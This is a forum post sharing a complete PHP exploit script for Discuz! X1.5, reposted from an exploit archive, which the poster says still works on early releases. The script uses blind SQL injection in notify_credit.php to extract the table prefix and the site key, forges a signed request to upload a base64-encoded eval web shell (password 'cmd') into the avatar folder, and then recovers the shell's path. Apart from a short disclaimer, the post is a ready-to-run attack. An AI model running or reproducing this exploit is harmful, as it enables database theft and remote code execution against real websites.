| |
| | |

CodersClub

 Forgot password?
 Register
Search
View: 8211|Reply: 0
Collapse the left

dx 1.5 exploit

[Copy link]

 United States

Post time: 2011-10-17 09:11
| Show all posts |Read mode
I have tested this exploit It works on discuz x 1.5
I think the have fixed it for the latest release but it still seems to work on early releases of x 1.5.
Once the process in done. A php file will be generated at avatars folder. I could not get it done to work but at least it could generate a blank php file on the server!

  1. discuz! X1.5 Get Shell 0day
  2. SSV-ID: 20681
  3. SSV-Appdir: Discuz!
  4. Published: 2011-07-03
  5. Exploit:
  6. [sebug.net]
  7. The following procedures (methods) may contain something offensive,they are only for security researches and teaching , at your own risk!
  8. <?php

  9. print_r('

  10. +---------------------------------------------------------------------------+

  11. Discuz! X1-1.5 notify_credit.php Blind SQL injection exploit by toby57    2010.11.05

  12. mail: admin at bkey org

  13. team: http://www.bkey.org

  14. 说明:alibaba把后续getshell代码添加了下去

  15. +---------------------------------------------------------------------------+

  16. ');

  17. if ($argc < 2) {

  18.     print_r('

  19. +---------------------------------------------------------------------------+

  20. Usage: php '.$argv[0].' url [pre]

  21. Example:

  22. php '.$argv[0].' http://localhost/

  23. php '.$argv[0].' http://localhost/ xss_

  24. +---------------------------------------------------------------------------+

  25. ');

  26.     exit;

  27. }

  28. error_reporting(7);

  29. ini_set('max_execution_time', 0);

  30. $url = $argv[1];

  31. $pre = $argv[2]?$argv[2]:'pre_';

  32. $target = parse_url($url);

  33. extract($target);

  34. $path1 = $path . '/api/trade/notify_credit.php';

  35. $hash = array();

  36. $hash = array_merge($hash, range(48, 57));

  37. $hash = array_merge($hash, range(97, 102));



  38. $tmp_expstr = "'";

  39. $res = send();

  40. if(strpos($res,'SQL syntax')==false){var_dump($res);die('Oooops.I can NOT hack it.');}

  41. preg_match('/FROM\s([a-zA-Z_]+)forum_order/',$res,$match);

  42. if($match[1])$pre = $match[1];

  43. $tmp_expstr = "' UNION ALL SELECT 0,1,0,0,0,0,0,0,0,0 FROM {$pre}common_setting WHERE ''='";

  44. $res = send();

  45. if(strpos($res,"doesn't exist")!==false){

  46.     echo "Table_pre is WRONG!\nReady to Crack It.Please Waiting..\n";

  47.     for($i = 1;$i<20;$i++){

  48.     $tmp_expstr = "' UNION ALL SELECT 0,1,0,0,0,0,0,0,0,0 FROM information_schema.columns WHERE table_schema=database() AND table_name LIKE '%forum_post_tableid%' AND LENGTH(REPLACE(table_name,'forum_post_tableid',''))=$i AND ''='";

  49.     $res = send();



  50.     if(strpos($res,'SQL syntax')!==false){   



  51.     $pre = '';

  52.     $hash2 = array();

  53.     $hash2 = array_merge($hash2, range(48, 57));

  54.     $hash2 = array_merge($hash2, range(97, 122));

  55.     $hash2[] = 95;

  56.     for($j = 1;$j <= $i; $j++){

  57.     for ($k = 0; $k <= 255; $k++) {

  58.     if(in_array($k, $hash2)) {

  59.     $char = dechex($k);

  60.     $tmp_expstr = "' UNION ALL SELECT 0,1,0,0,0,0,0,0,0,0 FROM information_schema.columns WHERE table_schema=database() AND table_name LIKE '%forum_post_tableid%' AND MID(REPLACE(table_name,'forum_post_tableid',''),$j,1)=0x{$char} AND ''='";

  61.     $res = send();

  62.     if(strpos($res,'SQL syntax')!==false){

  63.         echo chr($k);

  64.         $pre .= chr($k);break;

  65.     }  

  66.     }  

  67.     }     

  68.     }     

  69.     if(strlen($pre)){echo "\nCracked...Table_Pre:".$pre."\n";break;}else{die('GET Table_pre Failed..');};

  70.     }    }    };

  71. echo "Please Waiting....\n";

  72. $sitekey = '';

  73. for($i = 1;$i <= 32; $i++){

  74.   for ($k = 0; $k <= 255; $k++) {

  75.     if(in_array($k, $hash)) {

  76.     $char = dechex($k);

  77. $tmp_expstr = "' UNION ALL SELECT 0,1,0,0,0,0,0,0,0,0 FROM {$pre}common_setting WHERE skey=0x6D795F736974656B6579 AND MID(svalue,{$i},1)=0x{$char} AND ''='";

  78. $res = send();

  79. if(strpos($res,'SQL syntax')!==false){

  80.         echo chr($k);

  81.         $sitekey .= chr($k);break;

  82. }}}}

  83. /*

  84. By: alibaba
  85. 修改与添加了一些代码,如果成功就能得到shell
  86. 一句话秘密是 : cmd
  87. */

  88. if(strlen($sitekey)!=32)
  89. {
  90.         echo "\nmy_sitekey not found. try blank my_sitekey\n";
  91. }

  92. else echo "\nmy_sitekey:{$sitekey}\n";



  93. echo "\nUploading Shell...";

  94. $module = 'video';

  95. $method = 'authauth';

  96. $params = 'a:3:{i:0;i:1;i:1;s:36:"PD9waHAgZXZhbCgkX1BPU1RbY21kXSk7Pz4=";i:2;s:3:"php";}';

  97. $sign = md5($module . '|' . $method . '|' . $params . '|' . $sitekey);

  98. $data = "module=$module&method=$method¶ms=$params&sign=$sign";

  99. $path2 = $path . "/api/manyou/my.php";

  100. POST($host,80,$path2,$data,30);



  101. echo "\nGetting Shell Location...\n";

  102. $file = '';

  103. for($i = 1;$i <= 32; $i++){

  104.         for ($k = 0; $k <= 255; $k++) {

  105.             if(in_array($k, $hash)) {

  106.                         $char = dechex($k);

  107.                         $tmp_expstr = "' UNION ALL SELECT 0,1,0,0,0,0,0,0,0,0 FROM {$pre}common_member_field_home WHERE uid=1 AND MID(videophoto,{$i},1)=0x{$char} AND ''='";

  108.                         $res = send();

  109.                         if(strpos($res,'SQL syntax')!==false){

  110.                                 echo chr($k);

  111.                                 $file .= chr($k);break;

  112.                         }

  113.                 }

  114.         }

  115. }

  116. echo "\nShell: $host$path/data/avatar/". substr($file,0,1) . "/" . substr($file,1,1) . "/$file.php";
  117. exit;


  118. function sign($exp_str){
  119.     return md5("attach=tenpay&mch_vno={$exp_str}&retcode=0&key=");
  120. }



  121. function send(){

  122.     global $host, $path1, $tmp_expstr;

  123.      

  124.     $expdata = "attach=tenpay&retcode=0&trade_no=%2527&mch_vno=".urlencode(urlencode($tmp_expstr))."&sign=".sign($tmp_expstr);

  125.     return POST($host,80,$path1,$expdata,30);

  126. }   


  127. function POST($host,$port,$path,$data,$timeout, $cookie='') {
  128.         $buffer='';


  129.     $fp = fsockopen($host,$port,$errno,$errstr,$timeout);
  130.     if(!$fp) die($host.'/'.$path.' : '.$errstr.$errno);
  131.         else {
  132.         fputs($fp, "POST $path HTTP/1.0\r\n");
  133.         fputs($fp, "Host: $host\r\n");
  134.         fputs($fp, "Content-type: application/x-www-form-urlencoded\r\n");
  135.         fputs($fp, "Content-length: ".strlen($data)."\r\n");
  136.         fputs($fp, "Connection: close\r\n\r\n");
  137.         fputs($fp, $data."\r\n\r\n");
  138.       

  139.                 while(!feof($fp))
  140.                 {
  141.                         $buffer .= fgets($fp,4096);
  142.                 }
  143.                
  144.                 fclose($fp);
  145.     }
  146.         return $buffer;
  147. }
  148. ?>
  149. // sebug.net [2011-07-03]
Copy the Code



You have to log in before you can reply Login | Register

Points Rules

Archive|Mobile|Dark room|CodersClub

Top.Mail.Ru
Top.Mail.Ru

2024-11-22 10:05 GMT+3 , Processed in 0.017531 sec., 9 queries .

Powered by Discuz! X3.4 Release 20230520

© 2001-2024 Discuz! Team.

MultiLingual version, Rev. 4301, © codersclub.org

Quick Reply To Top Return to the list